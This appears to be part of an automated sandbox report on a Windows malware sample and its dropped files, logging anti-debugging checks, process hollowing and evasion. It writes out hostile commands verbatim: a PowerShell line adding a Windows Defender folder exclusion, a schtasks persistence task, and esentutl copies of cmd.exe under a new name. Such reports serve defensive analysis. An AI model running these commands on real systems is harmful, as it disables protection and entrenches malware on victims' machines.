                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96513
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96375
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96249
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96134
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96031
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 95916
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 95810
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 95703
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 95593
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 95484
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 95374
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 95265
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 95156
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 95046
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 94937
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 94828
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 94701
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 94593
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 94484
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 94374
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeThread delayed: delay time: 60000
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeThread delayed: delay time: 60000
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe
                    Source: xpha.pif, 00000010.00000002.1566080519.0000000002D5B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllz
                    Source: C6dAUcOA6M.exe, 00000000.00000002.1445092943.0000000000694000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1445092943.000000000063E000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007C9000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1667563278.000000000077A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000011.00000003.1712292652.000000000066B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2716618659.000000000066B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2410341370.000000000066B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000011.00000003.1679864810.000000000066B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000011.00000003.1523809233.000000000066B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2633471457.000000000066B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000011.00000003.1532040197.000000000066B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeAPI call chain: ExitProcess graph end nodegraph_0-39925
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeAPI call chain: ExitProcess graph end nodegraph_13-42047
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D0F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_02D0F744
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess queried: DebugPort
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess queried: DebugPort
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00F02E37 IsDebuggerPresent,7_2_00F02E37
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,13_2_004019F0
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D0894C LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02D0894C
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00F0C1FA mov eax, dword ptr fs:[00000030h]7_2_00F0C1FA
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_00492B94 mov eax, dword ptr fs:[00000030h]13_2_00492B94
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_006C1130 mov eax, dword ptr fs:[00000030h]13_2_006C1130
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_00703F3D mov eax, dword ptr fs:[00000030h]13_2_00703F3D
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00F0C1FA mov eax, dword ptr fs:[00000030h]15_2_00F0C1FA
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00EEA9D4 GetEnvironmentStringsW,GetProcessHeap,RtlAllocateHeap,memcpy,FreeEnvironmentStringsW,7_2_00EEA9D4
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess token adjusted: Debug
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00EF6EC0 SetUnhandledExceptionFilter,7_2_00EF6EC0
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00EF6B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00EF6B40
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifCode function: 11_1_00401475 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit,11_1_00401475
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifCode function: 11_1_004015D7 SetUnhandledExceptionFilter,11_1_004015D7
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifCode function: 11_1_004015D7 SetUnhandledExceptionFilter,11_1_004015D7
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_004123F1 SetUnhandledExceptionFilter,13_2_004123F1
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_0040CE09
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_0040E61C
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_00701361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00701361
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_00704C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00704C7B
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00EF6EC0 SetUnhandledExceptionFilter,15_2_00EF6EC0
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00EF6B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00EF6B40
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                    Allocates memory in foreign processes
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeMemory allocated: C:\Users\Public\Libraries\aymtmquJ.pif base: 400000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIFMemory allocated: C:\Users\Public\Libraries\aymtmquJ.pif base: 400000 protect: page execute and read and write
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIFMemory allocated: C:\Users\Public\Libraries\aymtmquJ.pif base: 400000 protect: page execute and read and write
                    Drops or copies cmd.exe with a different name (likely to bypass HIPS)
                    Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                    Sample uses process hollowing technique
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection unmapped: C:\Users\Public\Libraries\aymtmquJ.pif base address: 400000Jump to behavior
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIFSection unmapped: C:\Users\Public\Libraries\aymtmquJ.pif base address: 400000
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIFSection unmapped: C:\Users\Public\Libraries\aymtmquJ.pif base address: 400000
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeMemory written: C:\Users\Public\Libraries\aymtmquJ.pif base: 36F008Jump to behavior
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIFMemory written: C:\Users\Public\Libraries\aymtmquJ.pif base: 391008
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIFMemory written: C:\Users\Public\Libraries\aymtmquJ.pif base: 20D008
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeProcess created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pifJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /oJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" Jump to behavior
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe" Jump to behavior
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 02:17 /du 23:59 /sc daily /ri 1 /f
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
                    Source: C:\Users\Public\alpha.pifProcess created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_006E8550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,13_2_006E8550
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02CF5ACC
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: GetLocaleInfoA,0_2_02CFA7C4
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02CF5BD8
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: GetLocaleInfoA,0_2_02CFA810
                    Source: C:\Users\Public\alpha.pifCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,7_2_00EE8572
                    Source: C:\Users\Public\alpha.pifCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,7_2_00EE6854
                    Source: C:\Users\Public\alpha.pifCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,7_2_00EE9310
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: GetLocaleInfoA,13_2_00417A20
                    Source: C:\Users\Public\alpha.pifCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,15_2_00EE8572
                    Source: C:\Users\Public\alpha.pifCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,15_2_00EE6854
                    Source: C:\Users\Public\alpha.pifCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,15_2_00EE9310
                    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\Public\alpha.pifQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\alg.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\AppVClient.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TSTFF1C.tmp VolumeInformation
                    Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TSTFF2C.tmp VolumeInformation
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\ VolumeInformation
